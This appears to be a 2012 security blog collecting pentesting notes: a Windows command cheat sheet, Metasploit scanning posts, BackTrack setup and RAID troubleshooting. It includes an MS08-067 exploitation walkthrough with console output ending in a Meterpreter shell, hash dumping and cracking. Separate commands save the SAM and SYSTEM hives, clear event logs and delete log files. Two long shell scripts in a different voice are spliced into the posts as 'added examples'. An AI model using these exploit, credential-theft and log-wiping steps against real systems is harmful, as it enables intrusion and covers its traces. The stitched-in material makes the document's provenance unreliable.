Friday, 30 March 2012

Windows CMD line cheat sheet (hunter-gatherer)

Another quick note, this time for the Windows command line; this is pretty much a shortlist of things I found interesting in Rob Fuller's Google doc.

Generic Commands
whoami /all Lists the current user, their SID, the groups the current user is a member of (with their SIDs), and the current privilege level.
systeminfo Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta Displays information about RDP sessions. /CONNECT can be added
qprocess * Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name.
schtasks /query /fo csv /v > %TEMP%\tasks.csv Outputs the list of scheduled tasks in verbose csv format (redirect to a file name, not just the %TEMP% directory). Good for throwing in temp and pulling down for a closer look.
net start
sc query
Lists services
sc getkeyname "XXXXX" You can use the name you got from 'net start' to get the 'key name' of the service you want more information on.
sc queryex "XXXXX" Using the key name you got from 'getkeyname', you can query the status, pid and other information about the service.
tasklist /m  or tasklist /m blah.dll Lists all of the 'modules' (binaries: exe, dll, com or any other PE-based code that was executed) for each process, or if a module is specified then tasklist will only list the processes with that specific module loaded. Great for finding processes running crypto or other specific function dlls
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
Kill processes by name or pid (with force option)
fsutil fsinfo drives Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """" Locates insecurely registered executables (unquoted paths containing spaces) within the system registry on Windows 7.
netstat -nabo netstat with the owning process exe (-b needs an elevated prompt)
netstat -na | findstr :445 just like grep :)
net user %USERNAME% /domain Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain Lists all of the domain users
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators /domain This looks like it should not combine localgroup & /domain, but it is actually another way of getting the *current* domain admins
gpresult /z Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc query Displays services with their state, type and other info
rundll32.exe user32.dll, LockWorkStation lock the screen (that WOULD piss people off!!)
wscript.exe <script js/vbs> run things...
cscript.exe <script js/vbs/c#> run more things..

Remote access
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f Enable remote assistance

Reg Commands
reg save HKLM\Security security.hive   Save security hive to a file
reg save HKLM\System system.hive Save system hive to a file
reg save HKLM\SAM sam.hive Save sam to a file
reg add [\\TargetIPaddr\] [RegDomain][ \Key ] What it says on the tin
reg export [RegDomain]\[Key] [FileName] What it says on the tin
reg import [FileName ] What it says on the tin
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] Add /s to recurse through all subkeys and values

Deleting Logs
wevtutil el List logs
wevtutil cl <LogName> Clear specific log
del %WINDIR%\*.log /a /s /q /f What it says on the tin

Non interactive pkg management
wmic product get name /value Get the product names
wmic product where name="XXX" call uninstall /nointeractive Uninstall
pkgmgr /iu:"Package" Useful: install a Windows feature package by name
pkgmgr /iu:"TelnetServer" Install Telnet Service
pkgmgr /iu:"TelnetClient" Install the client

Stay tuned for more :)

Friday, 23 March 2012

Metasploit enumerating

Continuing from here...

You have your hosts scanned and added to your msf database, so... let's go banner grabbing :)

  • msfconsole

  • use auxiliary/scanner/smb/smb_version 
  • services -p 445 -R 
  • run 

  • use auxiliary/scanner/http/http_version 
  • services -p 80 -R 
  • run 

  • use auxiliary/scanner/postgres/postgres_version 
  • services -p 5432 -R 
  • run

  • use auxiliary/scanner/mysql/mysql_version 
  • services -p 3306 -R 
  • run

If you re-run hosts and services you will see a more up-to-date listing of the services the scripts picked up :)

to be continued..

Wednesday, 21 March 2012

Metasploit vs SMB

Continuing from the previous post (scanning)

Our hosts output is not very rewarding as is... so since we are looking for Windows SMB vulnerabilities, let's look at getting some version info

  • msfconsole> use auxiliary/scanner/smb/smb_version
  • services -p 445 -R
  • show options (increase the number of threads according to your flavor and make sure that your services -p 445 -R worked fine)
  • exploit
[*] is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:WIN2K3) (domain:WORKGROUP) 
[*] Scanned 1 of 3 hosts (033% complete) 
[*] is running Windows Server 2008 R2 Enterprise (Build 7600) (language: Unknown) (name:WIN2K8R2-ENT) (domain:WORKGROUP) 
[*] Scanned 2 of 3 hosts (066% complete) 
[*] is running Windows XP Service Pack 3 (language: English) (name:CISLAB) (domain:WORKGROUP) 
[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed
  • hosts (notice that the new info found its way in the database and appears now on the main list)
  • services -p 445 (same here :D )
  • back (we had our fill of that module lets try something else)
  • search type:exploit port:445 
  • info exploit/windows/smb/ms08_067_netapi
  • use exploit/windows/smb/ms08_067_netapi
  • services -p 445 (pick one.. this module does not have an RHOSTS option but an RHOST option)
  • set rhost
  • exploit
[*] Started reverse handler on  
[*] Automatically detecting the target... 
[*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown 
[*] We could not detect the language pack, defaulting to English 
[*] Selected Target: Windows 2003 SP2 English (NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 
[*] Meterpreter session 1 opened ( -> at 2012-03-19 21:21:30 +0000
meterpreter > (Kaboom!) 
  • run winenum ( be patient... it will create a directory.. in this case /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341 and will put all the information you want from that host there)
  • background (it will leave the session open and send you back to the msfconsole prompt)
  • cd /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341
  • ls
  • cat hashdump.txt (you could just run hashdump in the meterpreter session I know but we take the long way this time...)
  • take the Admin hash and use the rainbow tables provided online by 
  • sessions (will show you your active sessions) 
  • sessions -i 1 (will take you back to the active session on the 2003 box)

Stay tuned for more :P

Monday, 19 March 2012

Metasploit scanning

Some quick notes :)

Importing from nmap (ol skul)
  • db_status (make sure that your postgres is connected)
  • hosts (it should be empty)
  • nmap -sT -P0 -O --open -oX 10.1.87-range.xml (on the command line)
  • db_import /root/10.1.87-range.xml (or you can cd and ls to find the exact location and filename from your msf> console)
  • hosts (you should be able to see the hosts nmap has found)
  • services (it will show you the open ports on the found systems)
  • services -s ssh (break it down using the service name)
  • services -p 22 (break it down using the port number)
  • services -p 22 -R (When attacking multiple hosts or enumerating try this to load all the matching hosts to your RHOST option automagically)
  • hosts -d (to clear all imported hosts)
Using nmap through msfconsole (for the itchy junkie)
  • db_nmap -sT -P0 -O --open 
  • hosts (the itch stops)
The extra-quick way (usually == sloppy)
  • search portscan
  • use auxiliary/scanner/portscan/tcp 
  • set rhosts 
  • set threads 100 
  • set ports 445 80 21-25 110 139 143 8080 9090 8443 443 135 3389
  • run
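The steps in this post and in the "Metasploit enumerating" post above are the same loop every time: import the nmap XML, pick a version scanner, use "services -p <port> -R" to fill RHOSTS, run, repeat for the next port. As an added example (not the posts' own commands, and not part of Metasploit or nmap), here is a POSIX shell script that writes those steps out as a Metasploit resource script and feeds it to msfconsole with -r, so an authorized inventory scan of a range ends with the updated services table in one go. Assumptions: the msf database is connected, nmap and msfconsole are on PATH, and the function names gen_msf_rc and scan_and_enum are mine; -Pn is the current spelling of the post's -P0.

```shell
#!/bin/sh
# Added example: turn the manual msfconsole steps (db_import the nmap XML, then
# "use <version scanner>; services -p <port> -R; run" per port) into a resource
# script that msfconsole executes non-interactively with -r.
# Assumes the msf postgres database is connected and nmap/msfconsole are on PATH.

# Print a resource script to stdout.
# Usage: gen_msf_rc SCAN.xml PORT:MODULE [PORT:MODULE ...]
gen_msf_rc() {
    xml=$1
    [ -n "$xml" ] && [ "$#" -ge 2 ] || {
        echo "usage: gen_msf_rc SCAN.xml PORT:MODULE [PORT:MODULE ...]" >&2
        return 2
    }
    shift
    echo "db_status"                  # same sanity check as in the post
    echo "db_import $xml"
    for pair in "$@"; do
        port=${pair%%:*}              # text before the first colon
        module=${pair#*:}             # text after it
        case $port in
            ''|*[!0-9]*) echo "gen_msf_rc: bad port in '$pair'" >&2; return 2 ;;
        esac
        echo "use $module"
        echo "services -p $port -R"   # fill RHOSTS with hosts that have this port open
        echo "set THREADS 10"
        echo "run"
        echo "back"
    done
    echo "services"                   # the updated listing the post tells you to re-run
    echo "exit"
}

# Full run: scan a range with nmap, then enumerate with msfconsole.
# -Pn is the current spelling of the post's -P0; -O needs root.
scan_and_enum() {
    net=$1
    xml=${2:-scan.xml}
    [ -n "$net" ] || { echo "usage: scan_and_enum NETWORK [SCAN.xml]" >&2; return 2; }
    nmap -sT -Pn -O --open -oX "$xml" "$net" || return 1
    gen_msf_rc "$xml" \
        445:auxiliary/scanner/smb/smb_version \
        80:auxiliary/scanner/http/http_version \
        5432:auxiliary/scanner/postgres/postgres_version \
        3306:auxiliary/scanner/mysql/mysql_version > enum.rc || return 1
    msfconsole -q -r enum.rc
}
```

Run it as "scan_and_enum 10.1.87.0/24" after sourcing the file; the generated enum.rc is plain console commands, so you can read it before msfconsole runs it, and drop or add PORT:MODULE pairs to match the services you are actually allowed to touch.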

to be continued...

Tuesday, 13 March 2012

Debian - rpm cheat sheet

Working with BackTrack has its advantages, but having spent most of my adult life with Slackware and RedHat-based distros... I have found the following useful on many occasions

rpm -ivh {rpm-file}
dpkg -i {deb-file}
Install the package
rpm -Uvh {rpm-file}
Use apt-get :P
Upgrade the package
rpm -ev {package}
dpkg -r {package}
Erase/remove an installed package
rpm -ql {package}
dpkg -L {package}
List all files in the package
rpm -qa
dpkg -l {package}
List all installed packages
rpm -qi {package}
dpkg -p {package}
Display package information, including version and a short description
rpm -qf {/path/to/file}
dpkg -S {/path/to/file}
Find out which package a file belongs to.

Thanks for playing :)

Sunday, 11 March 2012

Backtrack 5 and ASUS TFT101

Since the tablet got rooted there are all kinds of beautiful things we can do with it :) One of those is BackTrack 5. Very easy to install (thanks to secmaniac)


Download BT5 for ARM on your PC from here

Unzip the 7z file and copy its contents to your memory card

On the tablet download and install ASTRO file manager (it has the unzip function you will need later)

While you're at it download and install PocketCloud (you will need it to VNC into the BT5 box later)

If you don't have one already, get a terminal emulator as well (yes, you need that too)

Go to the ASTRO file manager and find the directory you have bt5 on the memory card (/Removable/MicroSD/bt5).

Copy it to your internal memory under /sdcard/ (we need to unzip the image, and the result is bigger than the 4GB file-size limit of your FAT32 memory card)

Go into the bt5 directory you just copied over and unzip the bt5.img.gz file (Extract To This Directory). It will take a while, so go make yourself a cup of tea or something... [even if it does not show progress it is still unzipping, so wait until the file reaches 5GB]

Close ASTRO file manager, open up your Terminal Emulator and run:
cd /sdcard/bt5
cp busybox ../
( If you are using the Terminal Emulator Vol-UP+t is tab completion in case you are wondering..)
sh bootbt 
Now you should have a # prompt on the bt5 system; it's time to change your VNC password.
Go ahead and start the VNC session now (you can end it with stopvnc)
Now you can VNC from your box or from the tablet itself to port 5901 with the password you set and play :)

NOTE: DO NOT run apt-get update/upgrade/dist-upgrade; packages are not working 100% yet and you will lose stuff (stuff like gnome-terminal and firefox!)

Thanks for playing :)

Saturday, 10 March 2012

Backtrack notes

Some quick notes on Backtrack 5 RC2. Just some things that need to be done on a fresh install..

cd /opt/framework/lib/ (or /opt/metasploit/common/lib)
ln -s /usr/lib/
ln -s /usr/lib/ 

apt-get install rungetty
vi /etc/init/tty1.conf (comment out the last line and add)
exec /sbin/rungetty tty1 --autologin root
echo "startx" >> /root/.bash_profile

Icon fix:
gconftool -s /apps/metacity/general/button_layout -t string :minimize,maximize,close

apt-get install python-software-properties
add-apt-repository ppa:libreoffice/ppa
apt-get update
apt-get install libreoffice

more to come...

Cheers :)

raid-check mismatch count

Let's see...

You have a server with soft RAID (unfortunately, but you're gonna have to live with it!) and you get the unfortunate email:
WARNING: mismatch_cnt is not 0 on /dev/md0
Step 1: Don't panic ;)
Step 2: Troubleshooting
cat /sys/block/md0/md/mismatch_cnt
you should be seeing a number there other than the good 0
cat /sys/block/md0/md/sync_action
should be idle... so let's wake it up:
echo repair > /sys/block/md0/md/sync_action
echo check > /sys/block/md0/md/sync_action
cat /proc/mdstat
all looks well in the world and
cat /sys/block/md0/md/mismatch_cnt is 0 this time ;)
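As an added example (not from the post), here is the same procedure as a POSIX shell script. It differs from the two back-to-back echo lines above in one way that matters in practice: it waits for sync_action to go back to idle before starting the next pass, because the kernel rejects a write to sync_action while a pass is still running. Assumptions: the md sysfs directory is a parameter (defaulting to /sys/block/md0/md) so the functions can be tried against any array or a fake directory, and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the post): mismatch_cnt / sync_action handling that
# waits for each pass to finish instead of firing "repair" and "check" back to
# back. The md sysfs directory is a parameter so the functions can be
# exercised against a fake directory; it defaults to md0.

MD_DEFAULT=/sys/block/md0/md

# Print mismatch_cnt; exit status 0 when it is zero, 1 when not, 2 if unreadable.
md_mismatch_status() {
    dir=${1:-$MD_DEFAULT}
    cnt=$(cat "$dir/mismatch_cnt" 2>/dev/null) || return 2
    echo "$cnt"
    [ "$cnt" -eq 0 ]
}

# Block until sync_action reads "idle" or TIMEOUT seconds pass (poll every INTERVAL).
# Returns 0 when idle, 1 on timeout.
md_wait_idle() {
    dir=${1:-$MD_DEFAULT}; timeout=${2:-7200}; interval=${3:-10}
    waited=0
    while [ "$(cat "$dir/sync_action")" != "idle" ]; do
        [ "$waited" -lt "$timeout" ] || return 1
        sleep "$interval"
        waited=$((waited + interval))
    done
}

# Start one pass (repair or check) and wait for it to complete.
md_run_action() {
    dir=$1; action=$2; timeout=${3:-7200}; interval=${4:-10}
    case $action in
        repair|check) ;;
        *) echo "md_run_action: bad action '$action'" >&2; return 2 ;;
    esac
    md_wait_idle "$dir" "$timeout" "$interval" || return 1   # never queue behind a running pass
    echo "$action" > "$dir/sync_action"
    md_wait_idle "$dir" "$timeout" "$interval"
}

# The post's procedure end to end: report, repair, re-check, report again.
# Caveat: on RAID1/RAID10 a non-zero count can be benign (e.g. swap or writes
# still in flight); "repair" only makes the copies agree, it cannot know which
# copy was right, so a count that keeps coming back deserves a SMART/disk check.
md_fix_mismatch() {
    dir=${1:-$MD_DEFAULT}; timeout=${2:-7200}; interval=${3:-10}
    before=$(md_mismatch_status "$dir" || true)
    case $before in
        '') echo "cannot read $dir/mismatch_cnt" >&2; return 2 ;;
        0)  echo "mismatch_cnt is 0 on $dir, nothing to do"; return 0 ;;
    esac
    echo "mismatch_cnt before: $before"
    md_run_action "$dir" repair "$timeout" "$interval" || { echo "repair did not finish" >&2; return 1; }
    md_run_action "$dir" check  "$timeout" "$interval" || { echo "check did not finish" >&2; return 1; }
    after=$(cat "$dir/mismatch_cnt")
    echo "mismatch_cnt after:  $after"
    [ "$after" -eq 0 ]
}
```

Source the file and run "md_fix_mismatch" as root (or "md_fix_mismatch /sys/block/md1/md" for another array); its exit status is 0 only when the count is back to 0 after the check pass, which makes it usable from cron or a monitoring check.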
Cheers :)